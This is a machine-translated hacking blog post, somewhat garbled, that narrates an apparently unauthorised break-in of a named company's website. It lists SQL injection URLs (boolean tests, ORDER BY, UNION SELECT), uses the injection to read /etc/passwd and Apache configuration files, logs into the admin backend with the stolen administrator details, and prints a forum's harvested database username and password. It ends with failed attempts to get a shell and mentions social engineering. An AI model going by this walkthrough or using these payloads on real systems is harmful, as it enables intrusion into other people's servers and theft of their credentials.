Detect movie companies

Author: Leng yuedu cloud

Today, anyixuan is a well-known company in China. Let's open this website first! I hope you will not destroy it.

Http://www.lengyueduyun.com/news/show.php? Id = 457 and 1 = 1/* and 1 = 2/* return different results

Http://www.lengyueduyun.com/news/show.php? Id = 457 order by 14/* normal echo

Http://www.lengyueduyun.com/news/show.php? Id = 457 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14/* keyword 2 and 5

I can see this/* here is the annotation symbol in MYSQL, And there is # And -- # submit with % 23 in the URL ----- This sentence is boring!

Obtained by injection, the current user root @ localhost, the current database version 5.0.45, and the current database is xxx_cms!

User (), version (), database () -------- these are all MYSQL built-in functions, but there are actually a few more! This sentence is redundant...

It is easy to detect important data to be obtained now. Pass the injection! All data has a user table. I got a lot of important background administrator information ~

But what is the use of the Administrator's account password? The backend cannot be found! I used wwwscan to scan for no sensitive directories. Considering that the current user permission is ROOT, we can try to read sensitive files!

Read/etc/passwd

Root: x: 0: 0: root:/bin/bash

Bin: x: 1: 1: bin:/sbin/nologin

Daemon: x: 2: 2: daemon:/sbin/nologin

Adm: x: 3: 4: adm:/var/adm:/sbin/nologin

Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin

Sync: x: 5: 0: sync:/sbin:/bin/sync

Shutdown: x: 6: 0: shutdown:/sbin/shutdown

Halt: x: 7: 0: halt:/sbin/halt

Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin

News: x: 9: 13: news:/etc/news:

Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin

Operator: x: 11: 0: operator:/root:/sbin/nologin

Games: x: 12: 100: games:/usr/games:/sbin/nologin

Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin

Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin

Nobody: x: 99: 99: Nobody: // sbin/nologin

Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin

Messages: x: 81: 81: System message bus: // sbin/nologin

Avahi: x: 70: 70: Avahi daemon: // sbin/nologin

Mailnull: x: 47: 47:/var/spool/mqueue:/sbin/nologin

Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin

Nscd: x: 28: 28: NSCD Daemon: // sbin/nologin

Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin

Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin

Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin

Nfsnobody: x: 65534: 65534: Anonymous NFS User:/var/lib/nfs:/sbin/nologin

Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin

Ntp: x: 38: 38:/etc/ntp:/sbin/nologin

Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin

Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbin/nologin

Sabayon: x: 86: 86: Sabayon user:/home/sabayon:/sbin/nologin

Apache: x: 48: 48: Apache:/var/www:/sbin/nologin

Mysql: x: 27: 27: MySQL Server:/var/lib/mysql:/bin/bash

Www: x: 80: 80:/home/www:/bin/bash

Mq: x: 0: 0:/home/mq:/bin/bash

# Chinaui: x: 80: 80:/www:/sbin/nologin

Ftpdownres: x: 80: 80:/www/test/res:/sbin/nologin

Hbstars: x: 80: 80:/www/lujing/:/sbin/nologin

Chinauiadmin: x: 80: 80:/www:/sbin/nologin

/Www/lujing failed to read the file/www/lujing/index. php? This is not an absolute path!

Read/etc/httpd/conf/httpd. conf and read the apache file to obtain multiple subdomains and absolute paths ~~ The original path of the current website is.

<VirtualHost 127.0.0.1: 81>

DocumentRoot/www/hbstart/www/

ServerName www.lengyueduyun.com

AddType text/html. html

AddOutputFilter between des. html

<Directory/www/lujing/www/>

Php_value auto_prepend_file "/www/lujing/cms/frame/global. inc. php"

</Directory>

</VirtualHost>

/Www/lujing/www/index. php is read successfully. Try to read the file containing the MYSQL account and password. The following file does not exist!

/Www/lujing/www/config. php/www/lujing/www/conn. php/www/lujing/www/include/conn. php

/Www/lujing/cms/frame/global. inc. php

Then, I can see several subdomain names in the apache file and enter them to IE curiously. I found that this is the subdomain name used to manage the background of this website.

<VirtualHost 127.0.0.1: 81>

DocumentRoot/www/lujing/cms

ServerName admin.lengyueduyun.com

AddType text/html. html

AddOutputFilter between des. html

<Directory/www/lujing/cms>

Php_value auto_prepend_file "/www/lujing/cms/frame/global. inc. php"

</Directory>

</VirtualHost>

 

The injected account and password are successfully entered in the background.

However, the shell cannot be obtained. No matter how the file is uploaded, it is converted to jpg format! At this time, I saw a DZ Forum from apache. The version is not clear. I remember that the wolf family sent an article about DZ6 and shell. I am very white on the DZ Forum! Template editing. However, you are not allowed to edit the template in the background! I can't get the shell. This time it's really dizzy. It's been bothering me for a long time!

<VirtualHost 127.0.0.1: 81>

DocumentRoot/www/test/bbs/

ServerName forum.xxxx.com

AddType text/html. html

AddOutputFilter between des. html

ErrorDocument 404 http://forum.xxxx.com/images/avatars/noavatar.gif

<Directory/www/test/bbs>

/Www/test/bbs/config. inc. php read this file and get the mysql account password! But sadly? Phpmyadmin cannot be found either because external connection is not supported.

I thought I would use a subdomain name to manage my MYSQL. I didn't find it! Luck is always bad ~ Think of social engineering.

$ Dbhost = localhost; // Database Server

$ Dbuser = ui_bbs; // database username

$ Dbpw = 1107ui1107; // Database Password

$ Dbname = xxx_bbs; // Database Name

$ Pconnect = 0; // database persistent connection 0 = disabled, 1 = Enabled

I tested several administrators and used some MYSQL account passwords to find that none of them were successful.